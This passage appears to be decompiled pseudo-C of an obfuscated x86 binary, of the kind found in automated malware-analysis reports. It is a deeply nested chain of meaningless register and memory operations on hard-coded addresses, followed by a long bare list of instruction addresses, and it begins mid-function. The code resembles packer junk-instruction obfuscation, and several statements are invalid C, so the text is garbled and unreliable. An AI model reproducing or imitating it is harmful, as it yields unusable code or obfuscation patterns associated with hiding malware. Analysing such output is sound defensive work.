            																__esi = 0x12e80e9e |  *0xec4fe325;
            																 *0x727adabd =  *0x727adabd << 0xa2;
            																L1();
            																_pop( *0x665828e8);
            																__eflags = __ecx -  *0x82d11097;
            																__edi = 0xa7914f23 +  *0xc6ffe660 * 0xedf1;
            																__eflags = __ebx -  *0x71ba16f8;
            																if(__ebx !=  *0x71ba16f8) {
            																	goto L1;
            																} else {
            																	 *0x6fcc297a =  *0x6fcc297a >> 0xcc;
            																	asm("adc [0xe52229b0], ch");
            																	asm("sbb bh, 0x28");
            																	__eax = __eax | 0xa1cb993d;
            																	_push( *0x7ae35129);
            																	 *0x2a96af86 = __dl;
            																	__ebp = 0xc4bdbc9c;
            																	__ebx = __ebx +  *0x2bfcbc6f;
            																	__eflags = __ebx;
            																	if(__ebx >= 0) {
            																		goto L1;
            																	} else {
            																		asm("ror dword [0x847b5173], 0x7e");
            																		__bh = __bh |  *0xd0a4ece6;
            																		asm("rcr dword [0x1c008f92], 0x10");
            																		 *0xd3987534 =  *0xd3987534 << 0xa4;
            																		asm("lodsd");
            																		_pop(__esp);
            																		 *0x546ed5d7 = __ah;
            																		 *0xfcd6401e =  *0xfcd6401e + __eax;
            																		__eflags =  *0xde77b73b - __ecx;
            																		asm("rcl dword [0xb038270d], 0x5d");
            																		if( *0xde77b73b < __ecx) {
            																			goto L1;
            																		} else {
            																			__esp = __esp | 0xbc341078;
            																			__esi = __esi + 1;
            																			 *0x6658b036 =  *0x6658b036 & 0xc4bdbc9c;
            																			__ebx = __ebx | 0x75e38661;
            																			asm("ror dword [0x735d7262], 0xba");
            																			__al = 0x24;
            																			__ecx = __ecx |  *0xa9f6693e;
            																			__esp = __esp |  *0x463008db;
            																			asm("sbb [0x913be383], edx");
            																			_pop(__eax);
            																			__edx = __edx |  *0x59a7130e;
            																			_t36 = __eax;
            																			__eax =  *0x2ce134f5;
            																			 *0x2ce134f5 = _t36;
            																			__edx = __edx + 1;
            																			asm("movsb");
            																			__eflags = __bh & 0x000000ca;
            																			__ecx = __ecx ^  *0xecd8b8c4;
            																			asm("rol dword [0x9aa37a11], 0xfc");
            																			 *0x32fec48b =  *0x32fec48b + __ecx;
            																			__edx = __edx |  *0x2c67641e;
            																			 *0x61ce0cf =  *0x61ce0cf & __esp;
            																			__eflags = __ch & 0x00000004;
            																			 *0xe4a119ff =  *0xe4a119ff << 0x3a;
            																			_pop(__ebp);
            																			_push( *0x787a9165);
            																			__esi = __esi + 0xd96b498c;
            																			__ebx = __ebx | 0xd49f836d;
            																			__al = 0x00000024 &  *0x673b7a2c;
            																			 *0x6c56a339 =  *0x6c56a339 + __esp;
            																			__esp = __esp +  *0xf32985a3;
            																			__ebx = __ebx ^  *0xcb874796;
            																			asm("rol byte [0xb3de3234], 0xa9");
            																			__ecx = __ecx +  *0x99fe70bc;
            																			__eflags = __ecx;
            																			asm("lodsb");
            																			if(__ecx != 0) {
            																				goto L1;
            																			} else {
            																				__edx = __edx -  *0x5152ff7a;
            																				__edi = __edi ^  *0x20712df1;
            																				 *0x3feb16db =  *0x3feb16db >> 0x9b;
            																				__eflags =  *0x3feb16db;
            																				_t41 = __eax;
            																				__eax =  *0x5862cf33;
            																				 *0x5862cf33 = _t41;
            																				asm("rol byte [0x342fd604], 0xb6");
            																				__ecx = 0xb1ad29bb;
            																				if( *0x3feb16db > 0) {
            																					goto L1;
            																				} else {
            																					 *0x80d1477 =  *0x80d1477 >> 0x49;
            																					asm("adc ebx, [0x6ce58964]");
            																					 *0xca2a2f25 =  *0xca2a2f25 >> 0x4b;
            																					 *0x4eb0c21d =  *0x4eb0c21d >> 0xa7;
            																					__eflags =  *0x4eb0c21d;
            																					_push(0xd97868d3);
            																					if( *0x4eb0c21d <= 0) {
            																						goto L1;
            																					} else {
            																						__edi =  *0xc536757e * 0x5957;
            																						__eflags = __edi;
            																						if(__edi <= 0) {
            																							goto L1;
            																						} else {
            																							__ebx = __ebx -  *0x906c576;
            																							__eax = __eax - 1;
            																							__eflags = __eax;
            																							if(__eax <= 0) {
            																								goto L1;
            																							} else {
            																								__eflags = __esp -  *0x3b804a76;
            																								if(__esp <=  *0x3b804a76) {
            																									goto L1;
            																								} else {
            																									__esp =  *0xba63127e * 0x4abf;
            																									asm("rol byte [0xe9991028], 0x40");
            																									__eflags =  *0xba63127e * 0x4abf -  *0x56d43c13;
            																									__esp =  *0x89de076b * 0x6309;
            																									 *0x296e2fe5 =  *0x296e2fe5 - __cl;
            																									__eflags =  *0x296e2fe5;
            																									__ch =  *0x4561700a;
            																									if( *0x296e2fe5 >= 0) {
            																										goto L1;
            																									} else {
            																										__esi =  *0xa335757d * 0x3d27;
            																										__eax =  *0x1b550a6b * 0x6dc2;
            																										__esi =  *0xa335757d * 0x3d27 +  *0x27a335b9;
            																										__esp = 0x8d166b3d;
            																										__edi = __edi - 1;
            																										asm("sbb edx, [0xca7339eb]");
            																										__ecx = 0xffffffffb1ad29bc;
            																										 *0xddf44a66 =  *0xddf44a66 << 0x69;
            																										__eflags =  *0xddf44a66;
            																										if( *0xddf44a66 != 0) {
            																											goto L1;
            																										} else {
            																											__ebp = 0x31cde9e6;
            																											__eflags = 0xc4bdbc9c - 0x2bf6af39;
            																											 *0xdc7802d =  *0xdc7802d << 1;
            																											__eflags =  *0x41c61f37 - __edx;
            																											__edi = __edi +  *0xd830f48b;
            																											asm("adc [0xc0a9566c], eax");
            																											 *0xa9db150a - __dh = __eax - 0xb9694d94;
            																											__eflags =  *0xaee81fa2 - __ah;
            																											asm("stosd");
            																											__eflags =  *0x44c3b3f1 & 0xc4bdbc9c;
            																											 *0x43dd6827 =  *0x43dd6827 - __eax;
            																											_push( *0xf9108b9d);
            																											__edi =  *0xc7181211;
            																											__ebp = 0x31cde9e7;
            																											__ecx = 0xffffffffb1ad29bd;
            																											__eflags =  *0x990d1de & __edx;
            																											__al = 0x63;
            																											__eflags = __ch - 0xe5;
            																											asm("sbb eax, [0xc296e2f]");
            																											__cl = __cl + 0x28;
            																											__ebp = 0x31cde9e7 &  *0xb57b66ee;
            																											__eflags = __ebx -  *0x98097b9;
            																											 *0x19c19bd6 = 0xc4bdbc9c;
            																											asm("rol byte [0x99f70f22], 0x10");
            																											asm("adc [0xc40d07a9], eax");
            																											__edi =  *0xc7181211 + 0x1a038ad3;
            																											__eflags =  *0x7040fabd & __eax;
            																											__edx = __edx |  *0x7200396;
            																											asm("sbb edi, [0xb1da383b]");
            																											asm("rcr dword [0x594c0e85], 0x16");
            																											__ecx = 0xffffffffb1ad29bd -  *0x7ac78d09;
            																											__esi = __esi -  *0x5b668c83;
            																											_push( *0xec3f2e25);
            																											 *0x8b50e212 =  *0x8b50e212 << 0x89;
            																											__eflags =  *0x8b50e212;
            																											if( *0x8b50e212 > 0) {
            																												goto L1;
            																											} else {
            																												__eflags =  *0x9d4c077 & 0x8d166b3d;
            																												__edi = __edi -  *0x4c0023e;
            																												 *0x14be5731 =  *0x14be5731 >> 0xbc;
            																												__edx = __edx - 1;
            																												_pop(__eax);
            																												asm("rcr byte [0x13d10b63], 0xa9");
            																												__eflags =  *0x2c41f2fc & __esi;
            																												__ecx =  *0xee374b6a * 0xf74;
            																												__esi = __esi | 0xe3b82285;
            																												 *0xc4a539f8 =  *0xc4a539f8 ^ 0x8d166b3d;
            																												__eflags =  *0xc4a539f8;
            																												if( *0xc4a539f8 < 0) {
            																													goto L1;
            																												} else {
            																													 *0x970f5372 =  *0x970f5372 >> 0xc9;
            																													asm("adc [0x18717765], esi");
            																													__esp =  *0x113e661;
            																													asm("adc bl, 0x24");
            																													asm("ror dword [0x9ea3a86c], 0xd6");
            																													__eflags =  *0x4282f330 & 0x0000003c;
            																													if(( *0x4282f330 & 0x0000003c) >= 0) {
            																														goto L1;
            																													} else {
            																														__edi =  *0x665c347d * 0xba1d;
            																														__ebx =  *0x3a6e8c60 * 0xeca;
            																														 *0x4607e13e =  *0x4607e13e >> 0x68;
            																														__ebx =  *0x69ae9864;
            																														 *0xec3f2e25 =  *0xec3f2e25 << 0x73;
            																														asm("adc ah, 0x14");
            																														__esi = __esi ^ 0x8e4ba9fc;
            																														 *0xe5c1c0c5 =  *0xe5c1c0c5 | __ecx;
            																														__edx = __edx &  *0xd8346ddb;
            																														asm("movsw");
            																														 *0x74ddb0e5 & 0x00000063 =  *0x12e80666 & __eax;
            																														_push( *0x141df49f);
            																														asm("movsb");
            																														 *0x375b6e3c =  *0x375b6e3c & __dl;
            																														 *0x446cd6e6 =  *0x446cd6e6 ^ __ah;
            																														__eflags =  *0x584a14be & __ecx;
            																														 *0x73471363 =  *0x73471363 & __dl;
            																														 *0x8afc6668 =  *0x8afc6668 >> 0x1b;
            																														__edi =  *0x665c347d * 0x0000ba1d |  *0xf40577cb;
            																														__eflags = __edi;
            																														_push(0x2f1f756d);
            																														if(__edi > 0) {
            																															goto L1;
            																														} else {
            																															__esi =  *0xc488707f * 0x125b;
            																															_push(__eax);
            																															__ecx = __ecx +  *0xfad56ded;
            																															 *0x629b11b1 =  *0x629b11b1 + __ah;
            																															__eflags =  *0x4a68d620 & 0x0000003c;
            																															__ebx = __ebx ^  *0x584a14be;
            																															 *0x635c1363 =  *0x635c1363 | __bh;
            																															 *0x2a178a0b =  *0x2a178a0b << 0xf5;
            																															_t62 = __ebp;
            																															__ebp =  *0xe9338c6e;
            																															 *0xe9338c6e = _t62;
            																															__ebx = __ebx | 0x33194835;
            																															__eflags = __ebx;
            																															if(__ebx > 0) {
            																																goto L1;
            																															} else {
            																																__ebp =  *0xc488707f * 0x165b;
            																																__edx = __edx +  *0x7682976c;
            																																__edx = __edx &  *0x76c99a0d;
            																																__ebp = 1 +  *0xc488707f * 0x165b;
            																																__eflags =  *0x63ebc07 - __edx;
            																																__esp = __esp ^ 0xebaee9d1;
            																																_t63 = __edi;
            																																__edi =  *0xc774fbdc;
            																																 *0xc774fbdc = _t63;
            																																__esi = __esi |  *0x452cc616;
            																																 *0xd66acc35 =  *0xd66acc35 | __edx;
            																																__eflags =  *0xc774fbdc -  *0x635ac5f1;
            																																__edi =  *0xb86f336a * 0x6c25;
            																																__esp = __esp -  *0x74fbdceb;
            																																 *0xba420cc7 =  *0xba420cc7 << 0xf2;
            																																__esp =  *0x5b05c0d5;
            																																 *0xd609809c & __edx =  *0x270bc19b - __edx;
            																																 *0xfef51cbe =  *0xfef51cbe - __esp;
            																																__esp = __esp +  *0x374b6af3;
            																																 *0xcb0c74ee = __eax;
            																																 *0xd237462d =  *0xd237462d - __ebx;
            																																_pop(__eax);
            																																 *0xd609808b =  *0xd609808b >> 0xaf;
            																																_t66 = __esi;
            																																__esi =  *0x7914c19b;
            																																 *0x7914c19b = _t66;
            																																__ebp = 0x00000001 +  *0xc488707f * 0x0000165b | 0x74e1f8d8;
            																																 *0x342d2c02 & __dl = __bh - 0xc9;
            																																 *0xbc9dff85 =  *0xbc9dff85 - __ebp;
            																																 *0x6674dd92 =  *0x6674dd92 >> 0xd0;
            																																__edi =  *0xb86f336a * 0x00006c25 | 0x7612e806;
            																																asm("cmpsw");
            																																asm("adc ecx, [0x1494e5be]");
            																																__edi = ( *0xb86f336a * 0x00006c25 | 0x7612e806) ^  *0x4b76e339;
            																																 *0x7f5078d5 =  *0x7f5078d5 << 0x58;
            																																__edx = __edx &  *0x6352400f;
            																																__eax = 0xe6f3db0f;
            																																 *0xed741fdc =  *0xed741fdc - __edx;
            																																asm("rcr dword [0xf6f44026], 0xf5");
            																																__esp = __esp + 1;
            																																_pop( *0x17716327);
            																																__cl = __cl & 0x00000086;
            																																asm("movsw");
            																																__eflags =  *0x5fd39bdb - __esp;
            																																_pop(__ebx);
            																																__esi =  *0x7914c19b &  *0x366b5de;
            																																__ecx = 0x8fbd6d8b;
            																																 *0x4b9ff4dd =  *0x4b9ff4dd << 0x3a;
            																																 *0xcb40ac61 =  *0xcb40ac61 & __edx;
            																																__edx = __edx |  *0xd8fc9f0d;
            																																 *0x13f7f964 =  *0x13f7f964 >> 0x11;
            																																asm("sbb esp, 0xa9566c95");
            																																__eax = 0xe6f3db0f -  *0xfc100ac0;
            																																__ebx = __ebx - 1;
            																																__eflags = __ebx;
            																																if(__ebx > 0) {
            																																	goto L1;
            																																} else {
            																																	__esi = __esi -  *0x184b3777;
            																																	asm("adc esp, [0x91dce766]");
            																																	__eflags = __ebp -  *0x2fe56309;
            																																	_t69 = __esi;
            																																	__esi =  *0xcc0e296e;
            																																	 *0xcc0e296e = _t69;
            																																	__esi =  *0xcc0e296e -  *0x37008bd9;
            																																	__edx = __edx &  *0x62875d0f;
            																																	__eflags = __edx;
            																																	_pop(__ebx);
            																																	__ecx = 0xec3f2e25;
            																																	asm("rol dword [0x4aa7f71d], 0xb3");
            																																	asm("ror dword [0x12cc8e85], 0xcc");
            																																	asm("rcl dword [0xd90755a3], 0x8");
            																																	if(__edx <= 0) {
            																																		goto L1;
            																																	} else {
            																																		__esi = __esi ^  *0x31521d76;
            																																		__eflags = __esi;
            																																		if(__eflags != 0) {
            																																			goto L1;
            																																		} else {
            																																			asm("ror dword [0xee4d927b], 0xc2");
            																																			if(__eflags > 0) {
            																																				goto L1;
            																																			} else {
            																																				__ebx =  *0x505bd67f * 0x6382;
            																																				_t70 = __edx;
            																																				__edx =  *0x284abfba;
            																																				 *0x284abfba = _t70;
            																																				__eflags =  *0xf118de0b & __edi;
            																																				__ch = __ch | 0x000000b2;
            																																				asm("ror byte [0x4b6af13c], 0x3e");
            																																				__ebp = __ebp |  *0xc74ee37;
            																																				__eax = 0x2872e995;
            																																				asm("adc esp, 0x809550dd");
            																																				 *0xc19bd609 =  *0xc19bd609 >> 0x76;
            																																				_pop( *0x1d274f0d);
            																																				__al = 0xe2;
            																																				__ebx =  *0x505bd67f * 0x6382 - 0x7f6bb01;
            																																				asm("adc eax, [0xc0a9566c]");
            																																				asm("ror byte [0x39d0c0a], 0xb1");
            																																				asm("sbb edi, [0x58c92e2d]");
            																																				__ecx = 0xec3f2e25 +  *0xd6098094;
            																																				__edi = __edi ^  *0x3d15c19b;
            																																				 *0x15d91912 =  *0x15d91912 >> 0xed;
            																																				 *0x1a0bfebb - __edi = __esi - 0x8fff7bc5;
            																																				__bh = __bh - 0xe4;
            																																				_pop( *0xbc87ef66);
            																																				__cl = __cl ^ 0x00000032;
            																																				__edi = __edi +  *0x450c8b9b;
            																																				asm("movsw");
            																																				__ecx = 0xec3f2e25 +  *0xd6098094 |  *0x4a02bdc8;
            																																				 *0x9bd60980 =  *0x9bd60980 | __cl;
            																																				 *0x49360ec1 & __edx =  *0x301d86fd & __edx;
            																																				asm("adc edi, 0x5b23cb65");
            																																				__eflags =  *0xec3f2e25 & __edx;
            																																				asm("rol dword [0x16ef6611], 0x9f");
            																																				__eflags =  *0xf302390f & __esp;
            																																				asm("sbb esi, 0x98a20011");
            																																				asm("adc [0xbeed8a2e], edi");
            																																				__edx = __edx + 1;
            																																				__eflags = __esp -  *0xf9ae0eff;
            																																				__ecx = (0xec3f2e25 +  *0xd6098094 |  *0x4a02bdc8) ^  *0x9843f1f1;
            																																				asm("adc ebp, [0x5b534409]");
            																																				 *0xec3f2e25 =  *0xec3f2e25 << 0x93;
            																																				__ecx = ((0xec3f2e25 +  *0xd6098094 |  *0x4a02bdc8) ^  *0x9843f1f1) -  *0x22fd7e1e;
            																																				asm("sbb [0xbb915318], al");
            																																				__edx = __edx |  *0x355fc5bd;
            																																				__eflags = __edx;
            																																				asm("adc [0xc3ffb3dc], esi");
            																																				asm("sbb cl, 0x1c");
            																																				_pop(__ebx);
            																																				asm("rol dword [0x1fd18116], 0x4d");
            																																				_push( *0x7338fad4);
            																																				if(__edx >= 0) {
            																																					goto L1;
            																																					do {
            																																						do {
            																																							do {
            																																								goto L1;
            																																							} while ( *0x18340f6b * 0x3515 != 0);
            																																							asm("adc bl, [0x84018fe5]");
            																																							 *0x12718061 = _t100;
            																																							asm("adc ecx, [0x21e3bb36]");
            																																							asm("adc ebx, [0x24d12037]");
            																																							asm("sbb [0x5b1a54e2], cl");
            																																							 *0xff4d63c0 =  *0xff4d63c0 & _t100;
            																																							_push(_t119 |  *0x63600b9a);
            																																							_pop(_t119);
            																																							 *0x380eb915 = 0xf9a3822b;
            																																							asm("adc [0xc80cbe61], ebx");
            																																							asm("cmpsb");
            																																							asm("movsw");
            																																							asm("sbb ebx, [0xe03caab8]");
            																																							asm("rcr byte [0x26863eb6], 0xda");
            																																							_t100 =  *0x77828863;
            																																							_t117 = _t117 | 0x35d0a6bd;
            																																						} while (_t117 != 0);
            																																						_pop(_t92);
            																																					} while (_t92 >  *0x7bb4ad75);
            																																					 *0x36516130 = _t110;
            																																					 *0x8529e462 =  *0x8529e462 | _t119;
            																																					asm("adc [0x9527ecc4], eax");
            																																					asm("rcl dword [0xc4411223], 0x76");
            																																					asm("adc [0x82293618], bh");
            																																					_t90 = 1 +  *0xfcefa97f * 0xa4fe;
            																																					_push(_t100);
            																																					asm("lodsb");
            																																					asm("adc [0x598c3f17], ecx");
            																																					 *0xd0f946fc = _t90;
            																																					asm("rcl dword [0x5d778409], 0xd1");
            																																					return _t90;
            																																				} else {
            																																					 *0xe70a1171 =  *0xe70a1171 >> 0x94;
            																																					_push(__ecx);
            																																					__eax =  *0x3007ab0f;
            																																					__eax =  *0x3007ab0f + 1;
            																																					__eflags = __eax;
            																																					asm("adc ecx, [0xd95e5bdb]");
            																																					_t81 = __bh;
            																																					__bh =  *0x2744f622;
            																																					 *0x2744f622 = _t81;
            																																					asm("ror byte [0xd40f7163], 0x30");
            																																					return __eax;
            																																				}
            																																			}
            																																		}
            																																	}
            																																}
            																															}
            																														}
            																													}
            																												}
            																											}
            																										}
            																									}
            																								}
            																							}
            																						}
            																					}
            																				}
            																			}
            																		}
            																	}
            																}
            															}
            														}
            													}
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            			}













            0x0041d192
            0x0041d198
            0x0041d198
            0x0041d1ae
            0x0041d1b4
            0x0041d1ba
            0x0041d1bb
            0x0041d1c2
            0x0041d1c5
            0x0041d1cb
            0x0041d1d1
            0x0041d1db
            0x0041d1e1
            0x0041d1e7
            0x0041d1e7
            0x0041d1f6
            0x0041d1fd
            0x0041cf96
            0x0041cf9c
            0x0041cfa3
            0x0041cfa6
            0x0041cfae
            0x0041cfb5
            0x0041cfc1
            0x0041cfc7
            0x0041cfda
            0x0041cfe0
            0x0041cfed
            0x0041cff3
            0x0041cfff
            0x0041d000
            0x0041d007
            0x0041d009
            0x0041d010
            0x0041d019
            0x0041d023
            0x0041d02d
            0x0041d039
            0x0041d057
            0x0041d05d
            0x0041d063
            0x0041d06e
            0x0041d06f
            0x0041d070
            0x0041d07a
            0x0041d080
            0x0041d203
            0x0041d203
            0x0041d208
            0x0041d208
            0x0041d20e
            0x0041d213
            0x00000000
            0x0041d219
            0x0041d219
            0x0041d220
            0x0041d221
            0x0041d227
            0x0041d22d
            0x0041d233
            0x00000000
            0x0041d239
            0x0041d239
            0x0041d239
            0x0041d240
            0x0041d247
            0x00000000
            0x0041d24d
            0x0041d253
            0x0041d254
            0x0041d25a
            0x0041d260
            0x0041d261
            0x0041d268
            0x0041d269
            0x0041d26a
            0x0041d26b
            0x0041d26c
            0x0041d272
            0x0041d273
            0x0041d279
            0x0041d27a
            0x0041d27b
            0x0041d27e
            0x0041d284
            0x0041d28b
            0x0041d291
            0x0041d297
            0x0041d29e
            0x0041d2a4
            0x0041d2aa
            0x0041d2ab
            0x0041d2ae
            0x0041d2b4
            0x0041d2ba
            0x0041d2bb
            0x0041d2c1
            0x0041d2c7
            0x0041d2c8
            0x0041d2c8
            0x0041d2ce
            0x00000000
            0x0041d2d4
            0x0041d2d4
            0x0041d2da
            0x0041d2e0
            0x0041d2e1
            0x0041d2e8
            0x0041d2ee
            0x0041d2f4
            0x0041d2fa
            0x0041d300
            0x0041d300
            0x0041d301
            0x0041d307
            0x0041d30d
            0x00000000
            0x0041d313
            0x0041d313
            0x0041d319
            0x0041d320
            0x0041d320
            0x0041d326
            0x00000000
            0x0041d32c
            0x0041d32c
            0x0041d336
            0x0041d337
            0x0041d337
            0x0041d338
            0x0041d339
            0x0041d33a
            0x0041d33f
            0x00000000
            0x0041d345
            0x0041d345
            0x0041d34c
            0x0041d352
            0x0041d355
            0x0041d35f
            0x0041d360
            0x0041d367
            0x0041d36d
            0x0041d373
            0x0041d379
            0x0041d37c
            0x0041d382
            0x0041d388
            0x0041d38e
            0x0041d394
            0x0041d395
            0x0041d39b
            0x0041d3a1
            0x0041d3a7
            0x0041d3ad
            0x0041d3b3
            0x0041d3b9
            0x0041d3bf
            0x0041d3c5
            0x0041d3cc
            0x0041d3d2
            0x0041d3d5
            0x0041d3d5
            0x0041d3db
            0x00000000
            0x0041d3e1
            0x0041d3e1
            0x0041d3e7
            0x0041d3ee
            0x0041d3ef
            0x0041d3f5
            0x0041d3f6
            0x0041d3fc
            0x0041d402
            0x0041d403
            0x0041d404
            0x0041d40a
            0x0041d410
            0x0041d415
            0x0041d41c
            0x0041d422
            0x0041d423
            0x0041d429
            0x0041d430
            0x0041d436
            0x0041d43c
            0x0041d442
            0x0041d44c
            0x0041d452
            0x0041d458
            0x0041d45e
            0x0041d464
            0x0041d46a
            0x0041d470
            0x0041d476
            0x0041d47d
            0x0041d484
            0x0041d484
            0x0041d484
            0x0041d48a
            0x0041d490
            0x0041d496
            0x0041d49c
            0x0041d49d
            0x0041d4a3
            0x0041d4aa
            0x0041d4b0
            0x0041d4b6
            0x0041d4bd
            0x0041d4c3
            0x0041d4ca
            0x0041d4d0
            0x0041d4d6
            0x0041d4dc
            0x0041d4dd
            0x0041d4e3
            0x0041d4e9
            0x0041d4ef
            0x0041d4f5
            0x0041d4fb
            0x0041d502
            0x0041d508
            0x0041d50f
            0x0041d515
            0x0041d51b
            0x0041d521
            0x0041d521
            0x0041d521
            0x0041d527
            0x0041d52d
            0x0041d52f
            0x0041d539
            0x0041d53f
            0x0041d545
            0x0041d54b
            0x0041d551
            0x0041d558
            0x0041d55e
            0x0041d564
            0x0041d56b
            0x0041d56c
            0x0041d572
            0x0041d572
            0x0041d578
            0x00000000
            0x0041d57e
            0x0041d57e
            0x0041d588
            0x0041d58f
            0x0041d594
            0x0041d59a
            0x0041d5a1
            0x0041d5a8
            0x0041d5af
            0x0041d5b0
            0x0041d5b3
            0x0041d5b9
            0x0041d5bb
            0x0041d5c1
            0x0041d5cb
            0x0041d5d1
            0x0041d5d7
            0x0041d5d8
            0x0041d5de
            0x0041d5e4
            0x0041d5ea
            0x00000000
            0x0041d5f0
            0x0041d5f0
            0x0041d5f6
            0x0041d5fc
            0x0041d5fc
            0x0041d5fc
            0x0041d602
            0x0041d608
            0x0041d60d
            0x0041d60d
            0x0041d613
            0x0041d614
            0x0041d61a
            0x0041d620
            0x00000000
            0x0041d626
            0x0041d626
            0x0041d62c
            0x0041d632
            0x0041d638
            0x0041d63b
            0x0041d642
            0x0041d645
            0x0041d645
            0x0041d64b
            0x0041d655
            0x0041d65b
            0x0041d662
            0x0041d667
            0x0041d66d
            0x0041d673
            0x0041d679
            0x0041d67f
            0x00000000
            0x0041d685
            0x0041d685
            0x0041d68c
            0x0041d692
            0x0041d695
            0x0041d69a
            0x0041d6a0
            0x0041d6a6
            0x0041d6ab
            0x0041d6ab
            0x0041d6b1
            0x00000000
            0x0041d6b7
            0x0041d6b7
            0x0041d6be
            0x0041d6c4
            0x0041d6cb
            0x0041d6d2
            0x0041d6d3
            0x0041d6d4
            0x0041d6da
            0x0041d6e0
            0x0041d6e6
            0x0041d6ed
            0x00000000
            0x0041d6f3
            0x0041d6f3
            0x0041d6f9
            0x0041d6fa
            0x0041d700
            0x0041d706
            0x0041d70d
            0x0041d70f
            0x0041d715
            0x0041d71b
            0x0041d721
            0x0041d722
            0x0041d728
            0x0041d728
            0x0041d728
            0x0041d72e
            0x0041d72f
            0x0041d730
            0x0041d733
            0x0041d739
            0x0041d740
            0x0041d746
            0x0041d74c
            0x0041d752
            0x0041d755
            0x0041d75c
            0x0041d75d
            0x0041d763
            0x0041d769
            0x0041d76f
            0x0041d775
            0x0041d77b
            0x0041d781
            0x0041d787
            0x0041d78e
            0x0041d78e
            0x0041d794
            0x0041d795
            0x00000000
            0x0041d79b
            0x0041d79b
            0x0041d7a1
            0x0041d7a7
            0x0041d7a7
            0x0041d7ae
            0x0041d7ae
            0x0041d7ae
            0x0041d7b4
            0x0041d7bb
            0x0041d7c1
            0x00000000
            0x0041d7c7
            0x0041d7c7
            0x0041d7ce
            0x0041d7d4
            0x0041d7db
            0x0041d7db
            0x0041d7e2
            0x0041d7e7
            0x00000000
            0x0041d7ed
            0x0041d7ed
            0x0041d7ed
            0x0041d7f7
            0x00000000
            0x0041d7fd
            0x0041d7fd
            0x0041d803
            0x0041d803
            0x0041d804
            0x00000000
            0x0041d80a
            0x0041d80a
            0x0041d810
            0x00000000
            0x0041d816
            0x0041d816
            0x0041d820
            0x0041d827
            0x0041d82d
            0x0041d837
            0x0041d837
            0x0041d83d
            0x0041d843
            0x00000000
            0x0041d849
            0x0041d849
            0x0041d853
            0x0041d85d
            0x0041d863
            0x0041d869
            0x0041d86a
            0x0041d870
            0x0041d871
            0x0041d871
            0x0041d878
            0x00000000
            0x0041d87e
            0x0041d87e
            0x0041d884
            0x0041d88a
            0x0041d890
            0x0041d896
            0x0041d89c
            0x0041d8a8
            0x0041d8ad
            0x0041d8b3
            0x0041d8b4
            0x0041d8ba
            0x0041d8c0
            0x0041d8c6
            0x0041d8cc
            0x0041d8cd
            0x0041d8ce
            0x0041d8d4
            0x0041d8d6
            0x0041d8d9
            0x0041d8df
            0x0041d8e2
            0x0041d8e8
            0x0041d8ee
            0x0041d8f4
            0x0041d8fb
            0x0041d901
            0x0041d907
            0x0041d90d
            0x0041d913
            0x0041d919
            0x0041d920
            0x0041d926
            0x0041d92c
            0x0041d932
            0x0041d932
            0x0041d939
            0x00000000
            0x0041d93f
            0x0041d93f
            0x0041d945
            0x0041d94b
            0x0041d952
            0x0041d953
            0x0041d954
            0x0041d95b
            0x0041d961
            0x0041d96b
            0x0041d971
            0x0041d971
            0x0041d977
            0x00000000
            0x0041d97d
            0x0041d97d
            0x0041d984
            0x0041d98a
            0x0041d990
            0x0041d993
            0x0041d99a
            0x0041d9a0
            0x00000000
            0x0041d9a6
            0x0041d9a6
            0x0041d9b0
            0x0041d9bb
            0x0041d9c8
            0x0041d9c9
            0x0041d9d0
            0x0041d9d3
            0x0041d9d9
            0x0041d9df
            0x0041d9e5
            0x0041d9ed
            0x0041d9f3
            0x0041d9f9
            0x0041d9fa
            0x0041da00
            0x0041da06
            0x0041da0c
            0x0041da12
            0x0041da19
            0x0041da19
            0x0041da1f
            0x0041da24
            0x00000000
            0x0041da2a
            0x0041da2a
            0x0041da34
            0x0041da35
            0x0041da3b
            0x0041da41
            0x0041da47
            0x0041da4d
            0x0041da53
            0x0041da5a
            0x0041da5a
            0x0041da5a
            0x0041da60
            0x0041da60
            0x0041da66
            0x00000000
            0x0041da6c
            0x0041da6c
            0x0041da76
            0x0041da7c
            0x0041da82
            0x0041da83
            0x0041da8a
            0x0041da90
            0x0041da90
            0x0041da90
            0x0041da96
            0x0041da9c
            0x0041daa2
            0x0041daa8
            0x0041dab2
            0x0041dab8
            0x0041dabf
            0x0041dacb
            0x0041dad1
            0x0041dad7
            0x0041dadd
            0x0041dae3
            0x0041dae9
            0x0041daea
            0x0041daf1
            0x0041daf1
            0x0041daf1
            0x0041daf7
            0x0041db03
            0x0041db06
            0x0041db0c
            0x0041db13
            0x0041db19
            0x0041db1b
            0x0041db21
            0x0041db27
            0x0041db2e
            0x0041db34
            0x0041db3a
            0x0041db40
            0x0041db47
            0x0041db48
            0x0041db4e
            0x0041db51
            0x0041db53
            0x0041db59
            0x0041db5a
            0x0041db60
            0x0041db65
            0x0041db6c
            0x0041db72
            0x0041db78
            0x0041db7f
            0x0041db85
            0x0041db8b
            0x0041db8b
            0x0041db8c
            0x00000000
            0x0041db92
            0x0041db92
            0x0041db98
            0x0041db9e
            0x0041dba4
            0x0041dba4
            0x0041dba4
            0x0041dbaa
            0x0041dbb0
            0x0041dbb0
            0x0041dbb6
            0x0041dbb7
            0x0041dbbc
            0x0041dbc3
            0x0041dbca
            0x0041dbd1
            0x00000000
            0x0041dbd7
            0x0041dbd7
            0x0041dbd7
            0x0041dbdd
            0x00000000
            0x0041dbe3
            0x0041dbe3
            0x0041dbea
            0x00000000
            0x0041dbf0
            0x0041dbf0
            0x0041dbfa
            0x0041dbfa
            0x0041dbfa
            0x0041dc00
            0x0041dc06
            0x0041dc09
            0x0041dc10
            0x0041dc16
            0x0041dc1b
            0x0041dc21
            0x0041dc28
            0x0041dc2e
            0x0041dc30
            0x0041dc36
            0x0041dc3c
            0x0041dc43
            0x0041dc49
            0x0041dc4f
            0x0041dc55
            0x0041dc62
            0x0041dc68
            0x0041dc6b
            0x0041dc71
            0x0041dc74
            0x0041dc7a
            0x0041dc7c
            0x0041dc83
            0x0041dc8f
            0x0041dc95
            0x0041dc9b
            0x0041dca1
            0x0041dca8
            0x0041dcae
            0x0041dcb4
            0x0041dcba
            0x0041dcbb
            0x0041dcc1
            0x0041dcc7
            0x0041dccd
            0x0041dcd4
            0x0041dcda
            0x0041dce0
            0x0041dce0
            0x0041dce6
            0x0041dcec
            0x0041dcef
            0x0041dcf0
            0x0041dcf7
            0x0041dcfd
            0x00000000
            0x0041cf96
            0x0041cf96
            0x0041cf96
            0x00000000
            0x00000000
            0x0041d097
            0x0041d09d
            0x0041d0a5
            0x0041d0b2
            0x0041d0c3
            0x0041d0c9
            0x0041d0d5
            0x0041d0d6
            0x0041d0d7
            0x0041d0df
